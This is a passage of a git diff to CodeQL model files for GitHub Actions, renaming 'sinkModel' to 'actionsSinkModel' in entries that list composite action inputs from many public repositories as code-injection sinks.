+++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8..1578e397369 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63..17c45e0d8ed 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c..4e26b872800 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b2721..d5fa53d1bbb 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb22005..f90fb1c5e63 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c89..d16c0792c6d 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4..4d009c2d47d 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05d..afd875c2205 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31db..680bbe27bcb 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c..ffe074d3dea 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54..e53a58412c9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c..a899f727e39 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b795981..0c7c2e1bded 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10..3d631e60dc3 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3d..2f8710d2cbd 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da83..5490e62cdc9 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a0751..0c6df201a1c 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf2..7d0b894f35d 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3b..d85418c7a41 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e..074cf066e37 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c4636..c4497b59af8 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1..cc28e15a55b 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e..76fb41dadf1 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019..b786a672140 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d4..236ac8f2cd2 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9fa..64207dbca6a 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e8..46de0ff86c6 100644 
--- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b98225721..a07b223777b 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb11..e3470982f53 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab90..87535288d26 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1a..28249c82428 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e..8d1bbce631f 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb3..3c5f85a6e79 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec0..01a552361ec 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e..ab2e86ce868 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd670..8d6dd73bfd9 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a5..a20cbb1e24d 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5..62785bef86b 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f..9c10a54abc7 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f..4145ec19569 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38..5b63c9fec06 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebd..f21389b08b0 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc01879..1a6f42c25f6 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737..ea48b84310c 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453b..4e953d695f8 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc600..32040ef84ea 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1..b258ea1ce2d 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53..c0a51345ae6 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04..f362cd1f72b 100644 --- 